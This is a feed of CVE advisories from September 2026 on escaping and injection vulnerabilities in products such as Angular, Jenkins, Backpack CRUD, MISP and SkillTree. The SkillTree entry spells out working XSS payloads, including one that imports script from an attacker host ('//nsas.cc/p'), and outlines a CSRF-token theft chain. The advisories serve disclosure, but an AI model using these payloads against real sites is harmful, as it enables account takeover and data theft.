CVE-2026-19641 2026-09-15 5.3 Medium
On affected platforms running Arista EOS with password authentication configured, a specially crafted password can create orphan authentication sessions. Repeated exploitation of this issue can exhaust available authentication resources, resulting in legitimate users being unable to log in to the device. This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.
CVE-2026-84655 2 Jenkins, Jenkins Project 2 Jenkins, Jenkins 2026-09-15 4.3 Medium
Jenkins 2.579 and earlier, LTS 2.568.2 and earlier does not escape map keys when serializing objects as JSON and Python through its REST API, allowing attackers able to control map property names to inject arbitrary fields into JSON and Python API responses.
CVE-2026-54182 1 Laravel-backpack 1 Crud 2026-09-15 8.1 High
backpack/crud provides Create, Read, Update & Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. Prior to 4.1.70, 5.6.2, 6.8.13, and 7.0.36, Backpack\CRUD\Stats::makeCurlRequest in src/Stats.php is reached from BackpackServiceProvider::boot() and constructs a shell command with a URL influenced by the HTTP Host header, which it passes to exec() without adequate shell neutralization. An unauthenticated attacker whose malformed Host value reaches PHP can inject operating-system commands when exec() and curl are available and the 1-in-100 random gate is reached. Repeated requests can reach the random gate. Successful exploitation executes commands as the web-server user, exposing environment secrets, files, and reachable services and permitting data modification or service disruption. Common reverse-proxy Host validation and hardened PHP configurations that disable exec() reduce reachability but do not correct the vulnerable construction. This issue is fixed in versions 4.1.70, 5.6.2, 6.8.13, and 7.0.36.
CVE-2026-73195 1 Apache 1 Syncope 2026-09-14 7.3 High
Improper Encoding or Escaping of Output vulnerability in Apache Syncope. Authenticated users can store a spreadsheet formula payload in one of their own plain attributes. When such users are included in a CSV export and the generated CSV file is opened by a spreadsheet application, the formula may be executed. This issue affects Apache Syncope: from 3.0.0-M0 through 3.0.16, from 4.0.0-M0 Through 4.0.7, from 4.1.0-M0 through 4.1.2. Users are recommended to upgrade to version 4.0.8 / 4.1.3, which fix this issue.
CVE-2026-57583 2026-09-14 3.3 Low
OpenZeppelin Contracts Wizard is a web application to interactively build a contract out of components from OpenZeppelin Contracts. Prior to @openzeppelin/wizard 0.10.11, @openzeppelin/wizard-cairo 3.0.1, @openzeppelin/wizard-stellar 0.6.2, and @openzeppelin/wizard-stylus 0.3.1, the setInfo code path prints info.securityContact and info.license verbatim into single-line comments in generated Solidity, Cairo, Stellar/Soroban, and Stylus source. A line terminator ends the comment and causes following input to be emitted as source declarations. Exploitation requires an integration to populate these fields from untrusted input and a user to consume the generated source; normal self-service web, AI assistant, CLI, and self-hosted API use does not cross that trust boundary, shared links cannot set the fields, and no code executes on a Wizard service. This issue affects generated-source integrity only and is fixed in versions 0.10.11, 3.0.1, 0.6.2, and 0.3.1 of the respective packages.
CVE-2026-88058 1 Angular 1 Angular 2026-09-11 N/A
Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes ProcessingInstruction DOM nodes inside fallback raw-content elements without escaping matching ancestor closing tags. ProcessingInstruction data escaped greater-than characters but left less-than characters untouched and did not inspect fallback ancestors, so data such as a matching closing tag prematurely terminates noscript, iframe, noembed, or noframes containers. The vulnerable nodes cannot be authored through standard Angular templates; reachability requires application or library code using inject(DOCUMENT).createProcessingInstruction with attacker-controlled data or Renderer2 DOM insertion inside a fallback container. In HTML5 RAWTEXT parsing, the premature close causes subsequent sibling elements to be interpreted as live HTML and enables arbitrary JavaScript execution in a victim's browser. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.
CVE-2026-88921 1 Misp 1 Misp 2026-09-11 N/A
MISP contains an HTML injection vulnerability in the MISPElementHTMLFormatterTool component, which is responsible for rendering MISP element references (attributes, objects, and tags) into inline HTML during PDF report export via the convert_markdown_to_pdf module. The attribute(), objectAttribute(), object(), and tag() methods interpolated user-controlled fields (attribute type, attribute value, object name, object relation, tag name, tag colour, and tag text colour) directly into HTML templates without applying HTML entity encoding. An authenticated user with the ability to create or modify MISP attributes, objects, or tags could embed arbitrary HTML markup in these fields. When a report containing such elements was exported to PDF, the unescaped content was rendered as live HTML rather than inert text, potentially injecting script tags, breaking the document structure, or altering the visual content of the exported report. Additionally, the attribute() method contained a template with hardcoded sample values ("domain-ip" and "google.com") instead of format placeholders, meaning every plain attribute reference in a PDF displayed the sample text rather than the actual indicator value, constituting a data-integrity defect in the exported document. The vulnerability requires an authenticated actor with write access to MISP elements and a subsequent PDF export of a report referencing those elements. The security impact is primarily to the integrity of the exported document and, depending on the HTML-to-PDF rendering engine, potential execution of injected markup during the conversion step. Version affected: ≤2.5.45
CVE-2026-88060 1 Angular 1 Angular 2026-09-11 N/A
Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes untrusted input inside template content nested in fallback raw-content elements such as noscript, iframe, noembed, and noframes. The Domino serializer's fallbackRawContentTags traversal stopped at the DocumentFragment used by template.content, so matching closing tags in xmp, style, script, comments, or text nodes were not escaped. Standard interpolation with comments or text nodes is reachable without relaxed schemas; literal xmp or style requires CUSTOM_ELEMENTS_SCHEMA or NO_ERRORS_SCHEMA, while Renderer2 imperative DOM construction is unconditionally affected. When HTML5 RAWTEXT browser parsing encounters the unescaped closing tag, it exits the fallback container and interprets trailing markup as active DOM elements, enabling arbitrary JavaScript execution. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.
CVE-2026-69821 1 Microsoft 14 Windows 10 1607, Windows 10 1809, Windows Server 2012 and 11 more 2026-09-10 7.8 High
Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.
CVE-2026-54694 1 Nationalsecurityagency 1 Skills-service 2026-09-10 9.6 Critical
SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.
CVE-2026-15809 1 Redhat 4 Confidential Compute Attestation, Openshift, Openshift Container Platform and 1 more 2026-09-10 7.8 High
A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.
CVE-2026-87550 1 Google 1 Chrome 2026-09-09 4.3 Medium
Improper encoding or escaping of output in CSS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)
CVE-2026-79952 1 Dell 1 Secure Connect Gateway 2026-09-09 5.3 Medium
Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Encoding or Escaping of Output vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks.
CVE-2026-79964 1 Dell 1 Secure Connect Gateway 2026-09-09 5.3 Medium
Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Escape, Meta, or Control Sequences vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks.
CVE-2026-52772 1 Yeswiki 1 Yeswiki 2026-09-09 5.5 Medium
YesWiki is a wiki system written in PHP. Prior to version 4.6.6, Bazar form-field templates still apply |raw('html') to field.label / field.hint in attribute and label-body contexts, resulting stored XSS in form renders. This issue has been patched in version 4.6.6.
CVE-2026-82756 1 Ash-project 1 Ash Authentication Oauth2 Server 2026-09-08 N/A
Improper Encoding or Escaping of Output vulnerability in ash-project ash_authentication_oauth2_server allows an unauthenticated attacker to inject arbitrary authentication parameters into the WWW-Authenticate challenge header. BearerPlug and RequireScopePlug built the Bearer resource_metadata="..." challenge by interpolating a resource_metadata URL derived from the request tenant directly into the quoted value. In a multi-tenant application that sets the Ash tenant from request-controlled data (a subdomain, the Host, a path segment, or a header), a tenant containing a " closes the quoted value and appends attacker-chosen auth-params, including a second resource_metadata URL pointing at an attacker-controlled authorization server that spec-following clients follow. Carriage returns and line feeds are rejected by Plug, so this is parameter injection within one header, not response splitting. This issue affects ash_authentication_oauth2_server: from 0.1.3 before 0.3.1.
CVE-2026-84292 2 Fast-uri, Openjsf 2 Fast-uri, Fast-uri 2026-09-04 7.5 High
fast-uri serializes the port component of a URI without validating it. When recomposing the authority, the userinfo and host components are escaped but the port is concatenated verbatim, so a port value that is not a sequence of digits can inject authority delimiters, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both fast-uri and Node's URL read the result back as the attacker's host with no error, so re-validating the built URI does not catch it. This affects applications that build URIs from parts and assign untrusted data to the port component through the serialize, normalize, or equal functions in their object forms. The issue affects fast-uri versions before 2.4.6, from 3.0.0 before 3.1.7, and from 4.0.0 before 4.1.4. It is fixed in 2.4.6, 3.1.7, and 4.1.4, where recomposeAuthority rejects any port that is not a digit sequence per RFC 3986.
CVE-2026-77353 1 Ellite 1 Wallos 2026-09-03 4.6 Medium
Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, Wallos allows authenticated users to inject arbitrary iCalendar properties and events into their exported .ics feed by embedding raw CRLF sequences in subscription names or notes. Because the input validation layer only encodes HTML metacharacters but never strips newlines, and the export layer decodes those entities back before writing iCal output, an attacker with any valid account can craft a subscription whose name breaks out of the current VEVENT block and inserts fully attacker-controlled calendar events — including spoofed organizers, arbitrary email addresses in ATTENDEE properties, and misleading event content — into any calendar application subscribed to that feed. This issue has been patched in version 5.0.0.
CVE-2026-83610 1 Xmldom 1 Xmldom 2026-09-03 5.3 Medium
xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createEntityReference(name) accepts an invalid name and the ENTITY_REFERENCE_NODE serializer emits the resulting nodeName directly in &name; form. Directly serializing the node or fragment with XMLSerializer.serializeToString() and requireWellFormed: true can therefore break the entity-reference boundary and produce attacker-controlled XML markup when reparsed. The parser does not ordinarily create these nodes, and element-child insertion is rejected, so exploitation requires an application to create and directly serialize an EntityReference. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.
CVE-2026-65085 2 Linux, Nvidia 2 Linux Kernel, Openshell 2026-09-03 5.2 Medium
NVIDIA OpenShell for Linux contains a vulnerability in its inference proxy, where an attacker could cause an improper encoding or escaping of output. A successful exploit of this vulnerability might lead to information disclosure and data tampering.
